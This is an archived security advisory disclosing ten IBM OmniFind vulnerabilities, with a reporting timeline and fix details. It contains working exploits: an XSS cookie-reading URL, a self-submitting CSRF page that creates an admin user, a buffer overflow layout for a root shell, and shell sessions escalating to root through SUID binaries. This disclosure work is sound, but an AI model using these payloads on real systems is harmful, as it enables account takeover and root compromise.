[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

IBM OmniFind - several vulnerabilities



============================================
||| Security Advisory                    |||
||| CVE-2010-3890 (CVE candidate)        |||
||| CVE-2010-3891 (CVE candidate)        |||
||| CVE-2010-3892 (CVE candidate)        |||
||| CVE-2010-3893 (CVE candidate)        |||
||| CVE-2010-3894 (CVE candidate)        |||
||| CVE-2010-3895 (CVE candidate)        |||
||| CVE-2010-3896 (CVE candidate)        |||
||| CVE-2010-3897 (CVE candidate)        |||
||| CVE-2010-3898 (CVE candidate)        |||
||| CVE-2010-3899 (CVE candidate)        |||
============================================

IBM OmniFind several issues
===========================

Date released: 11/2010
Date reported: 04/2009

by Fatih Kilic
   Fraunhofer Institute for Secure Information Technology
   fatih.kilic@xxxxxxxxxxxxxxxxx
   http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3892
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3893
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3894
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3895
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3896
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3897
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3898
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3899

Vendor: IBM
Product: IBM OmniFind Enterprise Edition
Website: 
http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/
Vulnerabilities:
  - Cross-Site-Scripting (XSS)
  - Cross-Site-Request-Forgery (XSRF)
  - Session fixation
  - Session impersonation
  - Remote buffer overflow
  - Privilege escalation in two applications
  - Missing authentication in configuration panel
  - Admin password is delivered in plaintext inside the server response
  - Cookies are set for root path, not application path
  - Crawler endless loop


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

Quoting 
http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/:
| IBM(R) OmniFind(tm) Enterprise Edition drives users to the information that matters through knowledge driven search.
|
| It’s designed to drive users to the knowledge they seek and enhance the visibility of content and context of your organization's unstructured information.
|
| * Dynamic - delivers complete dynamic facet capabilities, type-ahead search, real-time content alerting, is reactive to search-led content exploration | * Tailorable - delivers business adjustable relevancy and UIMA standardization for entity identification and tuned semantic searching
|    * Supportable - delivers search on 20+ platform, connects to 30+ 
repositories
|    * Secure - delivers enforced security across content repositories
|    * Scalable - lucene-based index for enterprise level scalability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

* Cross-Site-Scripting (XSS) (CVE-2010-3890)

The GET parameter »command« used inside the administration interface is
embedded directly into the HTML source without any input validation or
output sanitization. Using this parameter the attacker can inject arbitrary
Javascript code which will be run in the session context of other users.
As session credentials are stored within cookies, an attacker can steal
the cookie information and impersonate (CVE-2010-3893) the session and
control the web application within the browser context of the victim.


Exploit to show cookies:
http://omnifind-host/ESAdmin/collection.do?command=<script>alert(document.
cookie);</script>


* Cross-Site-Request-Forgery (XSRF) (CVE-2010-3891)

The forms in the administrator interface are not protected against XSRF. The
attacker can do any action in the context of the victim.

An example attack scenario could be:
The attacker creates a malicious website with a prepared form to add a new
user, which will be submitted on load.


Exploit to add an admin user:
<html>
<head><title>Some seemingly benign web-site</title></head>
<body onLoad="document.forms[0].submit();">

<form method="post"
  action="http://omnifind-host/ESAdmin/security.do";>
<input type="hidden" name="command" value="saveNewUser"/>
<input type="hidden" name="user.name" value="joemueller"/>
<input type="hidden" name="user.role" value="0"/>
<input type="hidden" name="user.allCollections" value="true"/>
<input type="hidden" name="apply" value="OK"/>
</form>
</body>
</html>


Solution: Fixed in release v9.1 of Omnifind.

* Session fixation (CVE-2010-3892)

The login form of the administrator interface is vulnerable to session fixation
attacks. And attacker can use a prepared website or a XSS vulnerability 
(CVE-2010-3890)
to change session ID (SID) of the login form. The SID have to be generated by 
the
server. An attacker can visit the login interface and take the generated value 
and use
this for the attack. After a valid authentication of the victim with the 
attacker SID,
the attacker can do any action in the context of the administrator.


* Session impersonation (CVE-2010-3893)

The session ID (SID) is the only form of user authentication after the login 
and it
is not bound to an IP address. By reading the cookies of the victim, e.g. using 
an
XSS attack (CVE-2010-3890), the whole session can be hijacked and the attacker 
can
do any action in the context of the administrator from any computer that can 
reach
the administrator interface.


* Remote buffer overflow (CVE-2010-3894)

The administration interface has a login form with an username- and a 
passwordfield.
Entering a valid username (default value is »esadmin«) and a very long string 
into
the password field a buffer overflow is triggered.

The function Java_com_ibm_es_oss_CryptionNative_ESEncrypt() defined in the file
/opt/IBM/es/lib/libffq.cryptionjni.so is copying the password value to a fixed 
size
buffer of 2048 bytes.


There are two attack points to exploit this buffer overflow.

The first attack is based on the following buffer combination

password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes)

The inserted value for »firstattackpoint« will be used in the registers EAX and 
EDI.
These registers are used to write data into. This means you can insert any 
arbitrary
address, where you want to write to.

The second attack is overwriting the saved return address and has the following 
layout.

password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes) + 480 bytes + EDX (4 
bytes)
           + EAX (4 bytes) + EIP (4 bytes)

To reach the return to your overwritten instruction pointer, you have to insert 
a valid
writeable address as firstattackpoint. This second attack has some 
restrictions, you
can only use printable ASCII values. Non printable characters will be removed 
from the
input string.
This is no real barrier, since the code is big enough to have many jmp/call 
addresses,
which have printable ASCII values in their addresses.

During the overwrite the register ESI is pointing to your input, so you could 
use a
call *%esi to jump to your ASCII filtered shellcode.


During the first attackpoint your input is unfiltered, you can insert arbitrary 
values.
If you combine both attacks together, you can exploit it remotely and get a 
(root) shell.

Default running user is root :)



* Privilege escalation in two applications (CVE-2010-3895)

Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.

-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------


»esRunCommand« takes one argument and runs it as root. See example below.
-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand

  joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
  OUTPUT: cmd is id
  id
  uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------



The application »estaskwrapper« is meant to start the application »estasklight«.
The pseudo c code looks like this:
-------------------------------------------------------------------------
    main() {
      int auth = 0;
      ...
      if (argv[1] == "estasklight") {
        auth = 1;
          ...
          path = getenv("ES_LIBRARY_PATH");
          if (path) {
            setenv("LD_LIBRARY_PATH", path);
            setenv("LIBPATH", path);
            ...
            if (auth) {
                execvp ("estasklight", args);
            }
            ...
          }
        ...
      }
    ...
    }
-------------------------------------------------------------------------


Explanation of the code:

»argv[1]« is the first command line argument, that is compared with the string
»estasklight«. If it is equal the »auth« flag is set.
If the user has the environment variable »ES_LIBRARY_PATH« set, the value is
copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed.



Exploit for running /bin/sh
-------------------------------------------------------------------------
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------



* Missing authentication in configuration panel (CVE-2010-3896)

All pages below the the path »http://omnifind-host/ESSearchApplication/«; are 
reachable
without any authentication. The server configurations page is located inside 
this
directory at »http://omnifind-host/ESSearchApplication/palette.do«;. An attacker 
can
change the server configuration without authenticating himself against the 
application.


* Admin password is delivered in plaintext inside the server response 
(CVE-2010-3897)

The administrator password is embedded as value inside the HTML form at
»http://omnifind-host/ESSearchApplication/palette.do«; and is transmitted in 
plaintext
over HTTP. An attacker with access to this page, for example obtained by another bug like
»missing authentication« (CVE-2010-3896) or »session impersonation« 
(CVE-2010-3893),
can use this password as a backdoor to the system.


* Cookies are set for root path, not application path (CVE-2010-3898)

The cookies are not restricted to the »ESAdmin« path, they are set for the 
domain
root path. Every page inside the same domain, even from other directories, can 
access
the administrator cookies and steal the session ID, which are used for 
authentication.

* Crawler endless loop (CVE-2010-3899)

The crawler has no recursion depth limit. A site with dynamic parameter 
manipulation can
cause an endless loop. This loop will block the crawler thread and use 
permanent server
resources. Too many blocks can lead to a denial of service. The same site will 
be
indexed more times and the search results will display the same site many 
times. This
can be abused for spamming the search results.


Exploit to test the endless loop:
/* loop.php */
<?php
 $numb = rand();
 echo $numb.'<br><a href="loop.php?value='.$numb.'">click me</a>';
?>




+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Timeline:

* 04/2009: Vulnerability reported to IBM
* 05/2009: Response from IBM with a timeline of security updates
* 07/2010: Coordinating public release of advisory
* 11/2010: Public release of advisory

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

A fix for the buffer overflow (CVE-2010-3894) was provided in Omnifind v8.5 
Fixpack 6:
https://www-304.ibm.com/jct01003c/support/docview.wss?rs=3278&context=SS5SQ7&uid=swg24027159&loc=en_US&cs=utf-8&lang=en

Cross-Site-Scripting (CVE-2010-3890) and Privilege escalation in two applications (CVE-2010-3895)
are fixed in release v9.1 of Omnifind.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Fatih Kilic, Fraunhofer SIT (discovery)